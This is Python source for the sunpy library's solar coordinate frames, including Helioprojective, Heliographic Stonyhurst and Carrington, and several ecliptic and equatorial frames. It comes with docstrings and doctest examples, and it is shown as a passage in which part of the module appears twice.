... obstime="2011/01/05T00:00:50", observer="earth", frame="helioprojective")
>>> sc
<SkyCoord (Helioprojective: obstime=2011-01-05T00:00:50.000, rsun=695700.0 km, observer=<HeliographicStonyhurst Coordinate for 'earth'>): (Tx, Ty, distance) in (arcsec, arcsec, AU)
(137.87948623, -275.75878762, 1.00000112)>
"""
frame_specific_representation_info = {
SphericalRepresentation: [RepresentationMapping('lon', 'Tx', u.arcsec),
RepresentationMapping('lat', 'Ty', u.arcsec),
RepresentationMapping('distance', 'distance', None)],
SphericalDifferential: [RepresentationMapping('d_lon', 'd_Tx', u.arcsec/u.s),
RepresentationMapping('d_lat', 'd_Ty', u.arcsec/u.s),
RepresentationMapping('d_distance', 'd_distance', u.km/u.s)],
UnitSphericalRepresentation: [RepresentationMapping('lon', 'Tx', u.arcsec),
RepresentationMapping('lat', 'Ty', u.arcsec)],
}
rsun = QuantityAttribute(default=_RSUN, unit=u.km)
observer = ObserverCoordinateAttribute(HeliographicStonyhurst)
@property
def angular_radius(self):
"""
Angular radius of the Sun as seen by the observer.
The ``rsun`` frame attribute is the radius of the Sun in length units.
The tangent vector from the observer to the edge of the Sun forms a
right-angle triangle with the radius of the Sun as the far side and the
Sun-observer distance as the hypotenuse. Thus, the sine of the angular
radius of the Sun is ratio of these two distances.
"""
from sunpy.coordinates.sun import _angular_radius # avoiding a circular import
if not isinstance(self.observer, HeliographicStonyhurst):
if self.observer is None:
raise ValueError("The observer must be defined, not `None`.")
raise ValueError("The observer must be fully defined by specifying `obstime`.")
return _angular_radius(self.rsun, self.observer.radius)
def make_3d(self):
"""
This method calculates the third coordinate of the Helioprojective
frame. It assumes that the coordinate point is on the surface of the Sun.
If a point in the frame is off limb then NaN will be returned.
Returns
-------
new_frame : `~sunpy.coordinates.frames.Helioprojective`
A new frame instance with all the attributes of the original but
now with a third coordinate.
"""
# Skip if we already are 3D
if not self._is_2d:
return self
if not isinstance(self.observer, BaseCoordinateFrame):
raise ConvertError("Cannot calculate distance to the Sun "
f"for observer '{self.observer}' "
"without `obstime` being specified.")
rep = self.represent_as(UnitSphericalRepresentation)
lat, lon = rep.lat, rep.lon
# Check for the use of floats with lower precision than the native Python float
if not set([lon.dtype.type, lat.dtype.type]).issubset([float, np.float64, np.longdouble]):
raise SunpyUserWarning("The Helioprojective component values appear to be lower "
"precision than the native Python float: "
f"Tx is {lon.dtype.name}, and Ty is {lat.dtype.name}. "
"To minimize precision loss, you may want to cast the values to "
"`float` or `numpy.float64` via the NumPy method `.astype()`.")
# Calculate the distance to the surface of the Sun using the law of cosines
cos_alpha = np.cos(lat) * np.cos(lon)
c = self.observer.radius**2 - self.rsun**2
b = -2 * self.observer.radius * cos_alpha
# Ignore sqrt of NaNs
with np.errstate(invalid='ignore'):
d = ((-1*b) - np.sqrt(b**2 - 4*c)) / 2 # use the "near" solution
if self._spherical_screen:
sphere_center = self._spherical_screen['center'].transform_to(self).cartesian
c = sphere_center.norm()**2 - self._spherical_screen['radius']**2
b = -2 * sphere_center.dot(rep)
# Ignore sqrt of NaNs
with np.errstate(invalid='ignore'):
dd = ((-1*b) + np.sqrt(b**2 - 4*c)) / 2 # use the "far" solution
d = np.fmin(d, dd) if self._spherical_screen['only_off_disk'] else dd
return self.realize_frame(SphericalRepresentation(lon=lon,
lat=lat,
distance=d))
_spherical_screen = None
@classmethod
@contextmanager
def assume_spherical_screen(cls, center, only_off_disk=False):
"""
Context manager to interpret 2D coordinates as being on the inside of a spherical screen.
The radius of the screen is the distance between the specified ``center`` and Sun center.
This ``center`` does not have to be the same as the observer location for the coordinate
frame. If they are the same, then this context manager is equivalent to assuming that the
helioprojective "zeta" component is zero.
This replaces the default assumption where 2D coordinates are mapped onto the surface of the
Sun.
Parameters
----------
center : `~astropy.coordinates.SkyCoord`
The center of the spherical screen
only_off_disk : `bool`, optional
If `True`, apply this assumption only to off-disk coordinates, with on-disk coordinates
still mapped onto the surface of the Sun. Defaults to `False`.
Examples
--------
.. minigallery:: sunpy.coordinates.Helioprojective.assume_spherical_screen
>>> import astropy.units as u
>>> from sunpy.coordinates import Helioprojective
>>> h = Helioprojective(range(7)*u.arcsec*319, [0]*7*u.arcsec,
... observer='earth', obstime='2020-04-08')
>>> print(h.make_3d())
<Helioprojective Coordinate (obstime=2020-04-08T00:00:00.000, rsun=695700.0 km, observer=<HeliographicStonyhurst Coordinate for 'earth'>): (Tx, Ty, distance) in (arcsec, arcsec, AU)
[( 0., 0., 0.99660825), ( 319., 0., 0.99687244),
( 638., 0., 0.99778472), ( 957., 0., 1.00103285),
(1276., 0., nan), (1595., 0., nan),
(1914., 0., nan)]>
>>> with Helioprojective.assume_spherical_screen(h.observer):
... print(h.make_3d())
<Helioprojective Coordinate (obstime=2020-04-08T00:00:00.000, rsun=695700.0 km, observer=<HeliographicStonyhurst Coordinate for 'earth'>): (Tx, Ty, distance) in (arcsec, arcsec, AU)
[( 0., 0., 1.00125872), ( 319., 0., 1.00125872),
( 638., 0., 1.00125872), ( 957., 0., 1.00125872),
(1276., 0., 1.00125872), (1595., 0., 1.00125872),
(1914., 0., 1.00125872)]>
>>> with Helioprojective.assume_spherical_screen(h.observer, only_off_disk=True):
... print(h.make_3d())
<Helioprojective Coordinate (obstime=2020-04-08T00:00:00.000, rsun=695700.0 km, observer=<HeliographicStonyhurst Coordinate for 'earth'>): (Tx, Ty, distance) in (arcsec, arcsec, AU)
[( 0., 0., 0.99660825), ( 319., 0., 0.99687244),
( 638., 0., 0.99778472), ( 957., 0., 1.00103285),
(1276., 0., 1.00125872), (1595., 0., 1.00125872),
(1914., 0., 1.00125872)]>
"""
try:
old_spherical_screen = cls._spherical_screen # nominally None
center_hgs = center.transform_to(HeliographicStonyhurst(obstime=center.obstime))
cls._spherical_screen = {
'center': center,
'radius': center_hgs.radius,
'only_off_disk': only_off_disk
}
yield
finally:
cls._spherical_screen = old_spherical_screen
@add_common_docstring(**_frame_parameters())
class HeliocentricEarthEcliptic(SunPyBaseCoordinateFrame):
"""
A coordinate or frame in the Heliocentric Earth Ecliptic (HEE) system.
- The origin is the center of the Sun.
- The X-axis (0 degrees longitude and 0 degrees latitude) is aligned with the Sun-Earth line.
- The Z-axis (+90 degrees latitude) is aligned with the component perpendicular to the X-axis
of the mean ecliptic pole at the observation time.
Parameters
----------
{data}
{lonlat}
{distance_sun}
{common}
"""
@add_common_docstring(**_frame_parameters())
class GeocentricSolarEcliptic(SunPyBaseCoordinateFrame):
"""
A coordinate or frame in the Geocentric Solar Ecliptic (GSE) system.
- The origin is the center of the Earth.
- The X-axis (0 degrees longitude and 0 degrees latitude) is aligned with the Earth-Sun line.
- The Z-axis (+90 degrees latitude) is aligned with the component perpendicular to the X-axis
of the mean ecliptic pole at the observation time.
Parameters
----------
{data}
{lonlat}
{distance_earth}
{common}
Notes
-----
Aberration due to Earth motion is not included.
"""
@add_common_docstring(**_frame_parameters())
class HeliocentricInertial(SunPyBaseCoordinateFrame):
"""
A coordinate or frame in the Heliocentric Inertial (HCI) system.
- The origin is the center of the Sun.
- The Z-axis (+90 degrees latitude) is aligned with the Sun's north pole.
- The X-axis (0 degrees longitude and 0 degrees latitude) is aligned with the solar ascending
node on the ecliptic (mean J2000.0).
Parameters
----------
{data}
{lonlat}
{distance_sun}
{common}
Notes
-----
The solar ascending node on the ecliptic lies on the intersection of the solar equatorial
plane with the ecliptic plane, not on the intersection of the celestial equatorial plane with
the ecliptic plane.
"""
@add_common_docstring(**_frame_parameters())
class GeocentricEarthEquatorial(SunPyBaseCoordinateFrame):
"""
A coordinate or frame in the Geocentric Earth Equatorial (GEI) system.
- The origin is the center of the Earth.
- The Z-axis (+90 degrees latitude) is aligned with the Earth's north pole.
- The X-axis (0 degrees longitude and 0 degrees latitude) is aligned with the mean (not true)
vernal equinox.
Parameters
----------
{data}
{lonlat}
{distance_earth}
{equinox}
{common}
Notes
-----
Aberration due to Earth motion is not included.
"""
equinox = TimeFrameAttributeSunPy(default=_J2000)
| """
Common solar physics coordinate systems.
This submodule implements various solar physics coordinate frames for use with
the `astropy.coordinates` module.
"""
from contextlib import contextmanager
import numpy as np
import astropy.units as u
from astropy.coordinates import ConvertError, QuantityAttribute
from astropy.coordinates.baseframe import BaseCoordinateFrame, RepresentationMapping
from astropy.coordinates.representation import (
CartesianDifferential,
CartesianRepresentation,
CylindricalRepresentation,
SphericalDifferential,
SphericalRepresentation,
UnitSphericalRepresentation,
)
from astropy.time import Time
from sunpy import log
from sunpy.sun.constants import radius as _RSUN
from sunpy.time.time import _variables_for_parse_time_docstring
from sunpy.util.decorators import add_common_docstring
from sunpy.util.exceptions import SunpyUserWarning
from .frameattributes import ObserverCoordinateAttribute, TimeFrameAttributeSunPy
_J2000 = Time('J2000.0', scale='tt')
__all__ = ['SunPyBaseCoordinateFrame', 'BaseHeliographic',
'HeliographicStonyhurst', 'HeliographicCarrington',
'Heliocentric', 'Helioprojective',
'HeliocentricEarthEcliptic', 'GeocentricSolarEcliptic',
'HeliocentricInertial', 'GeocentricEarthEquatorial']
def _frame_parameters():
"""
Returns formatting dictionary to use with add_common_docstring to populate frame docstrings
"""
ret = {}
# Each text block is missing the first indent because it already exists in the frame docstring
ret['data'] = ("data : `~astropy.coordinates.BaseRepresentation` or ``None``\n"
" A representation object or ``None`` to have no data\n"
" (or use the coordinate component arguments, see below).")
ret['common'] = (f"obstime : {_variables_for_parse_time_docstring()['parse_time_types']}\n"
" The time of the observation. This is used to determine the\n"
" position of solar-system bodies (e.g., the Sun and the Earth) as\n"
" needed to define the origin and orientation of the frame.\n"
" representation_type : `~astropy.coordinates.BaseRepresentation`, str, optional\n"
" A representation class or string name of a representation class.\n"
" This may change the valid coordinate component arguments from the\n"
" defaults (see above). For example, passing\n"
" ``representation_type='cartesian'`` will make the frame expect\n"
" Cartesian coordinate component arguments (typically, ``x``, ``y``,\n"
" and ``z``).\n"
" copy : bool, optional\n"
" If `True` (default), make copies of the input coordinate arrays.")
ret['lonlat'] = ("lon : `~astropy.coordinates.Angle` or `~astropy.units.Quantity`, optional\n"
" The longitude coordinate for this object (``lat`` must also be\n"
" given and ``data`` must be ``None``).\n"
" Not needed if ``data`` is given.\n"
" lat : `~astropy.coordinates.Angle` or `~astropy.units.Quantity`, optional\n"
" The latitude coordinate for this object (``lon`` must also be\n"
" given and ``data`` must be ``None``).\n"
" Not needed if ``data`` is given.")
ret['radius'] = ("radius : `~astropy.units.Quantity`, optional\n"
" The radial distance coordinate from Sun center for this object.\n"
" Defaults to the radius of the Sun. Not needed if ``data`` is given.")
ret['distance_sun'] = ("distance : `~astropy.units.Quantity`, optional\n"
" The distance coordinate from Sun center for this object.\n"
" Not needed if ``data`` is given.")
ret['distance_earth'] = ("distance : `~astropy.units.Quantity`, optional\n"
" The distance coordinate from Earth center for this object.\n"
" Not needed if ``data`` is given.")
ret['xyz'] = ("x : `~astropy.units.Quantity`, optional\n"
" X-axis coordinate for this object. Not needed if ``data`` is given.\n"
" y : `~astropy.units.Quantity`, optional\n"
" Y-axis coordinate for this object. Not needed if ``data`` is given.\n"
" z : `~astropy.units.Quantity`, optional\n"
" Z-axis coordinate for this object. Not needed if ``data`` is given.")
ret['observer'] = ("observer : `~sunpy.coordinates.frames.HeliographicStonyhurst`, str\n"
" The location of the observer. If a string is provided,\n"
" it must be a solar system body that can be parsed by\n"
" `~sunpy.coordinates.ephemeris.get_body_heliographic_stonyhurst`\n"
" at the time ``obstime``. Defaults to Earth center.")
ret['rsun'] = ("rsun : `~astropy.units.Quantity`\n"
" The radius of the Sun in length units. Used to convert a 2D\n"
" coordinate (i.e., no ``radius`` component) to a 3D coordinate by\n"
" assuming that the coordinate is on the surface of the Sun. Defaults\n"
" to the photospheric radius as defined in `sunpy.sun.constants`.")
ret['equinox'] = (f"equinox : {_variables_for_parse_time_docstring()['parse_time_types']}\n"
" The date for the mean vernal equinox.\n"
" Defaults to the J2000.0 equinox.")
return ret
class SunPyBaseCoordinateFrame(BaseCoordinateFrame):
"""
Base class for sunpy coordinate frames.
This class is not intended to be used directly and has no transformations defined.
* Defines the frame attribute ``obstime`` for observation time.
* Defines a default wrap angle of 180 degrees for longitude in spherical coordinates,
which can be overridden via the class variable ``_wrap_angle``.
* Inject a nice way of representing the object which the coordinate represents.
"""
obstime = TimeFrameAttributeSunPy()
default_representation = SphericalRepresentation
default_differential = SphericalDifferential
frame_specific_representation_info = {
SphericalDifferential: [RepresentationMapping('d_lon', 'd_lon', u.arcsec/u.s),
RepresentationMapping('d_lat', 'd_lat', u.arcsec/u.s),
RepresentationMapping('d_distance', 'd_distance', u.km/u.s)],
}
_wrap_angle = 180*u.deg # for longitude in spherical coordinates
def __init__(self, *args, **kwargs):
self.object_name = None
# If wrap_longitude=False is passed in, do not impose a specific wrap angle for the frame
if not kwargs.pop('wrap_longitude', True):
self._wrap_angle = None
super().__init__(*args, **kwargs)
# If obstime is specified, treat the default observer (None) as explicitly set
if self.obstime is not None and self.is_frame_attr_default('observer'):
self._attr_names_with_defaults.remove('observer')
return
def represent_as(self, base, s='base', in_frame_units=False):
data = super().represent_as(base, s, in_frame_units=in_frame_units)
# If a frame wrap angle is set, use that wrap angle for any spherical representations.
if self._wrap_angle is not None and \
isinstance(data, (UnitSphericalRepresentation, SphericalRepresentation)):
data.lon.wrap_angle = self._wrap_angle
return data
def __str__(self):
# We override this here so that when you print a SkyCoord it shows the
# observer as the string and not the whole massive coordinate.
if getattr(self, "object_name", None):
return f"<{self.__class__.__name__} Coordinate for '{self.object_name}'>"
else:
return super().__str__()
@property
def _is_2d(self):
return (self._data is not None and self._data.norm().unit is u.one
and u.allclose(self._data.norm(), 1*u.one))
def __init_subclass__(cls, **kwargs):
super().__init_subclass__(**kwargs)
# TODO: Remove this after the minimum Astropy dependency includes astropy/astropy#12005
cls._fix_property_docstrings()
@classmethod
def _fix_property_docstrings(cls):
# This class method adds docstrings to properties dynamically created by
# BaseCoordinateFrame.__init_subclass__(). Accordingly, this method needs to itself be
# called from SunPyBaseCoordinateFrame.__init_subclass__() to work for our subclasses.
property_docstrings = {
'default_representation': "Default representation for position data",
'default_differential': "Default representation for differential data",
'frame_specific_representation_info': "Mapping for frame-specific component names",
}
for prop, docstring in property_docstrings.items():
if getattr(cls, prop).__doc__ is None:
setattr(getattr(cls, prop), '__doc__', docstring)
# TODO: Remove this after the minimum Astropy dependency includes astropy/astropy#12005
SunPyBaseCoordinateFrame._fix_property_docstrings()
class BaseHeliographic(SunPyBaseCoordinateFrame):
"""
Base class for HeliographicCarrington (HGC) and HeliographicStonyhurst (HGS) frames.
This class is not intended to be used directly and has no transformations defined.
"""
frame_specific_representation_info = {
SphericalRepresentation: [RepresentationMapping('lon', 'lon', u.deg),
RepresentationMapping('lat', 'lat', u.deg),
RepresentationMapping('distance', 'radius', None)],
SphericalDifferential: [RepresentationMapping('d_lon', 'd_lon', u.arcsec/u.s),
RepresentationMapping('d_lat', 'd_lat', u.arcsec/u.s),
RepresentationMapping('d_distance', 'd_radius', u.km/u.s)],
}
rsun = QuantityAttribute(default=_RSUN, unit=u.km)
def make_3d(self):
"""
Returns a fully 3D coordinate based on this coordinate.
If this coordinate is only 2D (i.e., no ``radius`` component) or is a
unit vector (i.e., the norm of the coordinate is unity), a new
coordinate is created that corresponds to the surface of the Sun.
That is, the 3D coordinate will retain the ``lon`` and ``lat``, and
``radius`` will be set to the frame's ``rsun`` frame attribute.
If this coordinate is already fully 3D, it is directly returned, even
if it does not lie on the surface of the Sun.
Returns
-------
frame : `~sunpy.coordinates.frames.BaseHeliographic`
The fully 3D coordinate
"""
if self._is_2d:
return self.realize_frame(self._data * self.rsun)
# The coordinate is already 3D
return self
@add_common_docstring(**_frame_parameters())
class HeliographicStonyhurst(BaseHeliographic):
"""
A coordinate or frame in the Stonyhurst Heliographic (HGS) system.
- The origin is the center of the Sun.
- The Z-axis (+90 degrees latitude) is aligned with the Sun's north pole.
- The X-axis (0 degrees longitude and 0 degrees latitude) is aligned with the projection of
the Sun-Earth line onto the Sun's equatorial plane.
This system is also know as the Heliocentric Earth Equatorial (HEEQ) system when
represented using Cartesian components.
A new instance can be created using the following signatures
(note that if supplied, ``obstime`` and ``representation_type`` must be
keyword arguments)::
HeliographicStonyhurst(lon, lat, obstime=obstime)
HeliographicStonyhurst(lon, lat, radius, obstime=obstime)
HeliographicStonyhurst(x, y, z, representation_type='cartesian', obstime=obstime)
Parameters
----------
{data}
{lonlat}
{radius}
{rsun}
{common}
Examples
--------
>>> from astropy.coordinates import SkyCoord
>>> import sunpy.coordinates
>>> import astropy.units as u
>>> sc = SkyCoord(1*u.deg, 1*u.deg, 2*u.km,
... frame="heliographic_stonyhurst",
... obstime="2010/01/01T00:00:45")
>>> sc
<SkyCoord (HeliographicStonyhurst: obstime=2010-01-01T00:00:45.000, rsun=695700.0 km): (lon, lat, radius) in (deg, deg, km)
(1., 1., 2.)>
>>> sc.frame
<HeliographicStonyhurst Coordinate (obstime=2010-01-01T00:00:45.000, rsun=695700.0 km): (lon, lat, radius) in (deg, deg, km)
(1., 1., 2.)>
>>> sc = SkyCoord(HeliographicStonyhurst(-10*u.deg, 2*u.deg))
>>> sc
<SkyCoord (HeliographicStonyhurst: obstime=None, rsun=695700.0 km): (lon, lat) in deg
(-10., 2.)>
>>> sc = SkyCoord(CartesianRepresentation(0*u.km, 45*u.km, 2*u.km),
... obstime="2011/01/05T00:00:50",
... frame="heliographic_stonyhurst")
>>> sc
<SkyCoord (HeliographicStonyhurst: obstime=2011-01-05T00:00:50.000, rsun=695700.0 km): (lon, lat, radius) in (deg, deg, km)
(90., 2.54480438, 45.04442252)>
"""
name = "heliographic_stonyhurst"
def _apply_diffrot(self, duration, rotation_model):
oldrepr = self.spherical
from sunpy.physics.differential_rotation import diff_rot
log.debug(f"Applying {duration} of solar rotation")
newlon = oldrepr.lon + diff_rot(duration,
oldrepr.lat,
rot_type=rotation_model,
frame_time='sidereal')
newrepr = SphericalRepresentation(newlon, oldrepr.lat, oldrepr.distance)
return self.realize_frame(newrepr)
@add_common_docstring(**_frame_parameters())
class HeliographicCarrington(BaseHeliographic):
"""
A coordinate or frame in the Carrington Heliographic (HGC) system.
- The origin is the center of the Sun.
- The Z-axis (+90 degrees latitude) is aligned with the Sun's north pole.
- The X-axis and Y-axis rotate with a period of 25.38 days.
This system differs from Stonyhurst Heliographic (HGS) in its definition of longitude. This
longitude is an "apparent" longitude because it takes into account the time it takes for light
to travel from the Sun's surface to the observer. Thus, the observer needs to be specified to
be able to transform to any other coordinate frame.
A new instance can be created using the following signatures
(note that if supplied, ``obstime`` and ``observer`` must be a keyword argument)::
HeliographicCarrington(lon, lat, obstime=obstime, observer=observer)
HeliographicCarrington(lon, lat, radius, obstime=obstime, observer=observer)
If you want to define the location in HGC such that the observer for the coordinate frame is
the same as that location (e.g., the location of an observatory in its corresponding HGC
frame), use ``observer='self'``::
HeliographicCarrington(lon, lat, radius, obstime=obstime, observer='self')
Parameters
----------
{data}
{lonlat}
{radius}
{observer}
{rsun}
{common}
Examples
--------
>>> from astropy.coordinates import SkyCoord
>>> import sunpy.coordinates
>>> import astropy.units as u
>>> sc = SkyCoord(1*u.deg, 2*u.deg, 3*u.km,
... frame="heliographic_carrington",
... observer="earth",
... obstime="2010/01/01T00:00:30")
>>> sc
<SkyCoord (HeliographicCarrington: obstime=2010-01-01T00:00:30.000, rsun=695700.0 km, observer=<HeliographicStonyhurst Coordinate for 'earth'>): (lon, lat, radius) in (deg, deg, km)
(1., 2., 3.)>
>>> sc = SkyCoord([1,2,3]*u.deg, [4,5,6]*u.deg, [5,6,7]*u.km,
... obstime="2010/01/01T00:00:45",
... observer="self",
... frame="heliographic_carrington")
>>> sc
<SkyCoord (HeliographicCarrington: obstime=2010-01-01T00:00:45.000, rsun=695700.0 km, observer=self): (lon, lat, radius) in (deg, deg, km)
[(1., 4., 5.), (2., 5., 6.), (3., 6., 7.)]>
>>> sc = SkyCoord(CartesianRepresentation(0*u.km, 45*u.km, 2*u.km),
... obstime="2011/01/05T00:00:50",
... frame="heliographic_carrington")
>>> sc
<SkyCoord (HeliographicCarrington: obstime=2011-01-05T00:00:50.000, rsun=695700.0 km, observer=None): (lon, lat, radius) in (deg, deg, km)
(90., 2.54480438, 45.04442252)>
"""
name = "heliographic_carrington"
_wrap_angle = 360*u.deg
observer = ObserverCoordinateAttribute(HeliographicStonyhurst)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if not isinstance(self.observer, BaseCoordinateFrame) and self.observer == 'self' and self._is_2d:
raise ValueError("Full 3D coordinate (including radius) must be specified "
"when observer='self'.")
@add_common_docstring(**_frame_parameters())
class Heliocentric(SunPyBaseCoordinateFrame):
"""
A coordinate or frame in the Heliocentric system, which is observer-based.
- The origin is the center of the Sun.
- The Z-axis is aligned with the Sun-observer line.
- The Y-axis is aligned with the component of the vector to the Sun's north pole that is
perpendicular to the Z-axis.
This frame defaults to a Cartesian component representation, which is known as Heliocentric
Cartesian (HCC). This frame can also be represented using cylindrical components, where
where ``rho`` is the impact parameter and ``psi`` is the position angle.
``psi`` is measured relative to the west limb, rather than solar north, so is shifted
by 90 degrees compared to the convention of the Heliocentric Radial (HCR) system.
A new instance can be created using the following signatures
(note that if supplied, ``obstime``, ``observer``, and ``representation_type`` must be
keyword arguments)::
Heliocentric(x, y, z, obstime=obstime, observer=observer)
Heliocentric(rho, psi, z, representation_type='cylindrical', obstime=obstime, observer=observer)
Parameters
----------
{data}
{xyz}
{observer}
{common}
Examples
--------
>>> from astropy.coordinates import SkyCoord, CartesianRepresentation
>>> import sunpy.coordinates
>>> import astropy.units as u
>>> sc = SkyCoord(CartesianRepresentation(10*u.km, 1*u.km, 2*u.km),
... obstime="2011/01/05T00:00:50", observer="earth", frame="heliocentric")
>>> sc
<SkyCoord (Heliocentric: obstime=2011-01-05T00:00:50.000, observer=<HeliographicStonyhurst Coordinate for 'earth'>): (x, y, z) in km
(10., 1., 2.)>
>>> sc = SkyCoord([1,2]*u.km, [3,4]*u.m, [5,6]*u.cm,
... obstime="2011/01/01T00:00:54", observer="earth", frame="heliocentric")
>>> sc
<SkyCoord (Heliocentric: obstime=2011-01-01T00:00:54.000, observer=<HeliographicStonyhurst Coordinate for 'earth'>): (x, y, z) in (km, m, cm)
[(1., 3., 5.), (2., 4., 6.)]>
>>> sc = SkyCoord(CylindricalRepresentation(10*u.km, 60*u.deg, 10*u.km),
... obstime="2011/01/05T00:00:50", observer="earth", frame="heliocentric")
>>> sc
<SkyCoord (Heliocentric: obstime=2011-01-05T00:00:50.000, observer=<HeliographicStonyhurst Coordinate for 'earth'>): (x, y, z) in km
(5., 8.66025404, 10.)>
"""
default_representation = CartesianRepresentation
default_differential = CartesianDifferential
frame_specific_representation_info = {
CylindricalRepresentation: [RepresentationMapping('phi', 'psi', u.deg)]
}
observer = ObserverCoordinateAttribute(HeliographicStonyhurst)
def represent_as(self, base, s='base', in_frame_units=False):
data = super().represent_as(base, s, in_frame_units=in_frame_units)
# For cylindrical representations, wrap the `psi` component (natively `phi`) at 360 deg
if isinstance(data, CylindricalRepresentation):
data.phi.wrap_at(360*u.deg, inplace=True)
return data
@add_common_docstring(**_frame_parameters())
class Helioprojective(SunPyBaseCoordinateFrame):
"""
A coordinate or frame in the Helioprojective Cartesian (HPC) system, which is observer-based.
- The origin is the location of the observer.
- ``Tx`` (aka "theta_x") is the angle relative to the plane containing the Sun-observer line
and the Sun's rotation axis, with positive values in the direction of the Sun's west limb.
- ``Ty`` (aka "theta_y") is the angle relative to the Sun's equatorial plane, with positive
values in the direction of the Sun's north pole.
- ``distance`` is the Sun-observer distance.
This system is frequently used in a projective form without ``distance`` specified. For
observations looking very close to the center of the Sun, where the small-angle approximation
is appropriate, ``Tx`` and ``Ty`` can be approximated as Cartesian components.
A new instance can be created using the following signatures
(note that if supplied, ``obstime`` and ``observer`` must be keyword arguments)::
Helioprojective(Tx, Ty, obstime=obstime, observer=observer)
Helioprojective(Tx, Ty, distance, obstime=obstime, observer=observer)
Parameters
----------
{data}
Tx : `~astropy.coordinates.Angle` or `~astropy.units.Quantity`
The theta_x coordinate for this object. Not needed if ``data`` is given.
Ty : `~astropy.coordinates.Angle` or `~astropy.units.Quantity`
The theta_y coordinate for this object. Not needed if ``data`` is given.
distance : `~astropy.units.Quantity`
The distance coordinate from the observer for this object.
Not needed if ``data`` is given.
{observer}
{rsun}
{common}
Examples
--------
>>> from astropy.coordinates import SkyCoord
>>> import sunpy.coordinates
>>> import astropy.units as u
>>> sc = SkyCoord(0*u.deg, 0*u.deg, 5*u.km,
... obstime="2010/01/01T00:00:00", observer="earth", frame="helioprojective")
>>> sc
<SkyCoord (Helioprojective: obstime=2010-01-01T00:00:00.000, rsun=695700.0 km, observer=<HeliographicStonyhurst Coordinate for 'earth'>): (Tx, Ty, distance) in (arcsec, arcsec, km)
(0., 0., 5.)>
>>> sc = SkyCoord(0*u.deg, 0*u.deg,
... obstime="2010/01/01T00:00:00", observer="earth", frame="helioprojective")
>>> sc
<SkyCoord (Helioprojective: obstime=2010-01-01T00:00:00.000, rsun=695700.0 km, observer=<HeliographicStonyhurst Coordinate for 'earth'>): (Tx, Ty) in arcsec
(0., 0.)>
>>> sc = SkyCoord(CartesianRepresentation(1*u.AU, 1e5*u.km, -2e5*u.km),
... obstime="2011/01/05T00:00:50", observer="earth", frame="helioprojective")
>>> sc
<SkyCoord (Helioprojective: obstime=2011-01-05T00:00:50.000, rsun=695700.0 km, observer=<HeliographicStonyhurst Coordinate for 'earth'>): (Tx, Ty, distance) in (arcsec, arcsec, AU)
(137.87948623, -275.75878762, 1.00000112)>
"""
frame_specific_representation_info = {
SphericalRepresentation: [RepresentationMapping('lon', 'Tx', u.arcsec),
RepresentationMapping('lat', 'Ty', u.arcsec),
RepresentationMapping('distance', 'distance', None)],
SphericalDifferential: [RepresentationMapping('d_lon', 'd_Tx', u.arcsec/u.s),
RepresentationMapping('d_lat', 'd_Ty', u.arcsec/u.s),
RepresentationMapping('d_distance', 'd_distance', u.km/u.s)],
UnitSphericalRepresentation: [RepresentationMapping('lon', 'Tx', u.arcsec),
RepresentationMapping('lat', 'Ty', u.arcsec)],
}
rsun = QuantityAttribute(default=_RSUN, unit=u.km)
observer = ObserverCoordinateAttribute(HeliographicStonyhurst)
@property
def angular_radius(self):
"""
Angular radius of the Sun as seen by the observer.
The ``rsun`` frame attribute is the radius of the Sun in length units.
The tangent vector from the observer to the edge of the Sun forms a
right-angle triangle with the radius of the Sun as the far side and the
Sun-observer distance as the hypotenuse. Thus, the sine of the angular
radius of the Sun is ratio of these two distances.
"""
from sunpy.coordinates.sun import _angular_radius # avoiding a circular import
if not isinstance(self.observer, HeliographicStonyhurst):
if self.observer is None:
raise ValueError("The observer must be defined, not `None`.")
raise ValueError("The observer must be fully defined by specifying `obstime`.")
return _angular_radius(self.rsun, self.observer.radius)
def make_3d(self):
"""
This method calculates the third coordinate of the Helioprojective
frame. It assumes that the coordinate point is on the surface of the Sun.
If a point in the frame is off limb then NaN will be returned.
Returns
-------
new_frame : `~sunpy.coordinates.frames.Helioprojective`
A new frame instance with all the attributes of the original but
now with a third coordinate.
"""
# Skip if we already are 3D
if not self._is_2d:
return self
if not isinstance(self.observer, BaseCoordinateFrame):
raise ConvertError("Cannot calculate distance to the Sun "
f"for observer '{self.observer}' "
"without `obstime` being specified.")
rep = self.represent_as(UnitSphericalRepresentation)
lat, lon = rep.lat, rep.lon
# Check for the use of floats with lower precision than the native Python float
if not set([lon.dtype.type, lat.dtype.type]).issubset([float, np.float64, np.longdouble]):
raise SunpyUserWarning("The Helioprojective component values appear to be lower "
"precision than the native Python float: "
f"Tx is {lon.dtype.name}, and Ty is {lat.dtype.name}. "
"To minimize precision loss, you may want to cast the values to "
"`float` or `numpy.float64` via the NumPy method `.astype()`.")
# Calculate the distance to the surface of the Sun using the law of cosines
cos_alpha = np.cos(lat) * np.cos(lon)
c = self.observer.radius**2 - self.rsun**2
b = -2 * self.observer.radius * cos_alpha
# Ignore sqrt of NaNs
with np.errstate(invalid='ignore'):
d = ((-1*b) - np.sqrt(b**2 - 4*c)) / 2 # use the "near" solution
if self._spherical_screen:
sphere_center = self._spherical_screen['center'].transform_to(self).cartesian
c = sphere_center.norm()**2 - self._spherical_screen['radius']**2
b = -2 * sphere_center.dot(rep)
# Ignore sqrt of NaNs
with np.errstate(invalid='ignore'):
dd = ((-1*b) + np.sqrt(b**2 - 4*c)) / 2 # use the "far" solution
d = np.fmin(d, dd) if self._spherical_screen['only_off_disk'] else dd
return self.realize_frame(SphericalRepresentation(lon=lon,
lat=lat,
distance=d))
_spherical_screen = None
@classmethod
@contextmanager
def assume_spherical_screen(cls, center, only_off_disk=False):
"""
Context manager to interpret 2D coordinates as being on the inside of a spherical screen.
The radius of the screen is the distance between the specified ``center`` and Sun center.
This ``center`` does not have to be the same as the observer location for the coordinate
frame. If they are the same, then this context manager is equivalent to assuming that the
helioprojective "zeta" component is zero.
This replaces the default assumption where 2D coordinates are mapped onto the surface of the
Sun.
Parameters
----------
center : `~astropy.coordinates.SkyCoord`
The center of the spherical screen
only_off_disk : `bool`, optional
If `True`, apply this assumption only to off-disk coordinates, with on-disk coordinates
still mapped onto the surface of the Sun. Defaults to `False`.
Examples
--------
.. minigallery:: sunpy.coordinates.Helioprojective.assume_spherical_screen
>>> import astropy.units as u
>>> from sunpy.coordinates import Helioprojective
>>> h = Helioprojective(range(7)*u.arcsec*319, [0]*7*u.arcsec,
... observer='earth', obstime='2020-04-08')
>>> print(h.make_3d())
